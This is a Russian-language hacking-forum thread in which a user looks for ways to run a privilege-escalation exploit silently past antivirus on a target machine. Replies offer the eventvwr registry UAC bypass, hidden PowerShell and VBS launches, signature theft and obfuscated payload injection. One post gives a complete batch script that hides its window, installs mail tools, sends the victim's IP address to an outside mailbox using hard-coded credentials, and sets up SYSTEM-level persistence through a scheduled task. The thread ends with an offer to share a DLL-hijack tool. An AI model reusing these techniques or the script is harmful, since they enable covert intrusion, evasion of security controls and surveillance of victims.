Вопрос о скрытии окна командной строки (Windows)

G

giloo

Всем привет! Вопрос достаточно деликатный для меня. Есть сплоит для поднятия прав в ОС. Он запускает исполняемый файл с возможностью передачи аргументов. Но делает он это с отображением окна (к примеру cmd.exe). Есть ли такое приложение, или особая техника для выполнения команды без различных окон?
Был у меня почти идеальный вариант - eventvwr.exe. Он мало того что выполнял тихонечко команду через реестр, да еще и права админки давал. К сожалению все попытки изменить его ветку реестра (hkcu\software\classes\mscfile\shell\open\commad\*evil) палятся авшками(( Поэтому он отпадает. Пробовала wscript, тоже не то. Скриптам не доверяют ав.
Сразу оговорюсь, пишу на шарпе. Могу собрать тихое приложение сама и дать ему на отработку все команды. Но я выбрала другой вектор атаки, а именно базирующийся на доверенных файлах. А ав не доверяют нонейм exeшкам и прочим скриптам.
Буду рада любым советам и идеям!) Спасибо всем заранее!
 

binarymaster

Member
09.01.2018
23
52
BIT
0
Но делает он это с отображением окна (к примеру cmd.exe). Есть ли такое приложение, или особая техника для выполнения команды без различных окон?
Просто выполняйте запуск программы с параметром SW_HIDE для скрытия окна (через API - или ). Но имейте ввиду, что это не универсальный вариант, не для любого приложения (но для cmd.exe сойдёт).
 
  • Нравится
Реакции: a113 и n01n02h

z3r0c10wn

Grey Team
04.09.2017
229
295
BIT
208
Всем привет! Вопрос достаточно деликатный для меня. Есть сплоит для поднятия прав в ОС. Он запускает исполняемый файл с возможностью передачи аргументов. Но делает он это с отображением окна (к примеру cmd.exe). Есть ли такое приложение, или особая техника для выполнения команды без различных окон?
Был у меня почти идеальный вариант - eventvwr.exe. Он мало того что выполнял тихонечко команду через реестр, да еще и права админки давал. К сожалению все попытки изменить его ветку реестра (hkcu\software\classes\mscfile\shell\open\commad\*evil) палятся авшками(( Поэтому он отпадает. Пробовала wscript, тоже не то. Скриптам не доверяют ав.
Сразу оговорюсь, пишу на шарпе. Могу собрать тихое приложение сама и дать ему на отработку все команды. Но я выбрала другой вектор атаки, а именно базирующийся на доверенных файлах. А ав не доверяют нонейм exeшкам и прочим скриптам.
Буду рада любым советам и идеям!) Спасибо всем заранее!


powershell.exe -noprofile -nologo -noninteractiv -w hidden file.exe
 
G

giloo

Всем спасибо большое за ответы)
Но к сожалению ни один из вариантов не подошел(
Можно попытаться приклеить подпись чужую к файлу https://github.com/secretsquirrel/SigThief
Подпись - это хорошо. Но чаще всего ав определяют доверие к файлу по базе хэш сумм. К примеру приложение было запущено 100 000 раз и без всякого подозрительного поведения, даже без подписи автоматически становились доверенными. Проверенная практика.
Просто выполняйте запуск программы с параметром SW_HIDE для скрытия окна (через API - или ). Но имейте ввиду, что это не универсальный вариант, не для любого приложения (но для cmd.exe сойдёт).
Не подходит, вы предлагаете написать новое приложение, а это новая хэш сумма :3
powershell.exe -noprofile -nologo -noninteractiv -w hidden file.exe
Вылетает окошко powershell :( почти сразу исчезает, но жутко палевно(
 
G

giloo

Eventvwr.exe запускает mmc в скрытном режиме через ветку реестра. Никто не знает, есть ли еще подобные приложения в Windows?
 

z3r0c10wn

Grey Team
04.09.2017
229
295
BIT
208
Могу предложить такой вариант - создаем file.vbs

Код:
Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "Programm.exe", 0
Set WShell = Nothing

Для запуска отдаем:
wscript ""path\to\your vbs file.vbs"
Код:
wscript "file.vbs"

в данном случае в VBS так же можно передать параметры
Код:
WShell.Run "Programm.exe /argument1 /argument2", 0

Последний параметр обязательно оставляем 0 - так как он и передает значение запуска в скрытом режиме.
 
  • Нравится
Реакции: binarymaster и Vertigo
G

giloo

Как я уже писала, на целевой машине ав блокирует все скрипты и приложения с неизвестной сигнатурой. Я думаю копать в сторону dll hijack. Знает кто-нибудь доверенное приложение от майкрософт с возможностью hijack?
 

z3r0c10wn

Grey Team
04.09.2017
229
295
BIT
208
Для подготовки к подобного рода векторам атаки, необходимо понять на чем вы палитесь -
1) On-access scan
2) In-memory scan
3) Traffic analyze - если поднимаете шелл

В серьезных корп АВ - если ИБшник не халтурничает и нет большого легаси, все эти пункты настроены и работают как надо.

1) Вам нужно простое, легальное и не большое приложение - не больше putty
2) Inject в приложение обфусцированно-криптованой нагрузкой - собирайте в памяти
3) Выполнение нагрузки.
Платный shellter в мануальном режиме в помощь

Описанный выше вариант поможет только от On-access scan и только в некоторых случаях от In-memory
Но опять же - все зависит от параметров in-memory scan.
Если там(на in-memory scan) обычная эвристика - указанный метод её обойдет.
Если вам противостоит маньяк-ИБшник который включил в АВ поведенческий анализ (такое есть к примеру у корп версий Касперского или например у корп версии TrendMicro), вряд ли вы что то сделаете. В таких случаях стоит работать в полях на уровне компрометации сетевых коннектов.
2е - даже если вы обманите на этапе сборки и эксплуатации вашей нагрузки АВ, не забывайте что если сплойт публичный - АВ его обнаружит без проблем.

P.S. и еще момент, если в сети стоит Cisco-firepower в нормальном настроенном виде, то компрометируем систему только локально. Соц-тех вектор.
 
  • Нравится
Реакции: giloo
V

Valkiria

Могу дополнить все предыдущие ответы своим вариантом.
Но прежде считаю необходимым обрисовать ситуацию.
Когда-то передо мной стояла задача контролировать изменения динамического IP адреса жертвы.
Сейчас для этого существует специальный софт, но не тогда ))
Я достигла желаемого результата при помощи консольных программ .
Выполнение консольных программ нужно было как-то скрыть, появление командной строки было недопустимо.
Для этого я воспользовалась программой cmdow.exe.
cmdow.exe - это консольная утилита Windows, которая позволяет скрывать командную строку при выполнении консольных программ.
Приведу пример использования утилиты из своего опыта.
Например, батник следующего содержания запустится без появления окна командной строки (содержимое не играет роли, важна только первая строка)
Код:
cmdow @ /HID
chcp 1251
md "%SYSTEMROOT%\system32\rm"
move /y "wget.exe" "%SYSTEMROOT%\system32\wget.exe"
move /y "cmdow.exe" "%SYSTEMROOT%\system32\rm\cmdow.exe"
move /y "blat.exe" "%SYSTEMROOT%\system32\blat.exe"
move /y "blat.lib" "%SYSTEMROOT%\system32\blat.lib"
move /y "blat.dll" "%SYSTEMROOT%\system32\blat.dll
move /y "blatdll.h" "%SYSTEMROOT%\system32\blatdll.h
move /y "ip.bat" "%SYSTEMROOT%\system32\rm\ip.bat"
%SYSTEMROOT%\system32\blat.exe -install -server smtp.mail.ru 3 -port 25 -f 333tot@mail.ru -u 333tot@mail.ru -pw kd95757
wget -O - -q icanhazip.com > C:\11.txt
%SYSTEMROOT%\System32\blat.exe C:\11.txt -subject %computername% -to 333tot@mail.ru
del C:\11.txt
schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %systemroot%\system32\rm\ip.bat /f

Обрати внимание на первую строчку батника.
Код:
cmdow @ /HID
Именно она обеспечивает сокрытие окна командной строки ))
Естественно, программу необходимо скачать, предварительно погуглив (она бесплатная).
 
Последнее редактирование модератором:
  • Нравится
Реакции: Vertigo, Remir и Ondrik8
G

giloo

Для подготовки к подобного рода векторам атаки, необходимо понять на чем вы палитесь -
1) On-access scan
2) In-memory scan
3) Traffic analyze - если поднимаете шелл

В серьезных корп АВ - если ИБшник не халтурничает и нет большого легаси, все эти пункты настроены и работают как надо.

1) Вам нужно простое, легальное и не большое приложение - не больше putty
2) Inject в приложение обфусцированно-криптованой нагрузкой - собирайте в памяти
3) Выполнение нагрузки.
Платный shellter в мануальном режиме в помощь

Описанный выше вариант поможет только от On-access scan и только в некоторых случаях от In-memory
Но опять же - все зависит от параметров in-memory scan.
Если там(на in-memory scan) обычная эвристика - указанный метод её обойдет.
Если вам противостоит маньяк-ИБшник который включил в АВ поведенческий анализ (такое есть к примеру у корп версий Касперского или например у корп версии TrendMicro), вряд ли вы что то сделаете. В таких случаях стоит работать в полях на уровне компрометации сетевых коннектов.
2е - даже если вы обманите на этапе сборки и эксплуатации вашей нагрузки АВ, не забывайте что если сплойт публичный - АВ его обнаружит без проблем.

P.S. и еще момент, если в сети стоит Cisco-firepower в нормальном настроенном виде, то компрометируем систему только локально. Соц-тех вектор.
В крепости проактивка :) А так спасибо большое за развернутый совет. Вот как раз таки ищу легальное ПО для инжектов.
Именно она обеспечивает сокрытие окна командной строки ))
Естественно, программу необходимо скачать, предварительно погуглив (она бесплатная).
Уу) скачала я ее) мой дохлый ав ее сразу убил)) прям пристрелил)
 
V

Valkiria

Уу) скачала я ее) мой дохлый ав ее сразу убил)) прям пристрелил)
Действительно, результат сканирования просто поражает ))

В этом случае мы имеем дело с явлением, которое я описывала в этой статье ))
Пять лет назад антивирусы были безразличны к этой программе.
Времена меняются.
 
G

giloo

Действительно, результат сканирования просто поражает ))
Я тоже в пала в удивление когда опробовала этот метод)

В общем... Нашла я метод, чуть кони не двинула пока реализовала его. В итоге как и говорила, решила hijackингом. Есть доверенная апа с подписью от винды, и ее злая длл :3
Всем спасибо большое за попытку помочь!))
Если кому нужно, могу скинуть(в личку) творение с исходным кодом. Хаппи Хак!)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!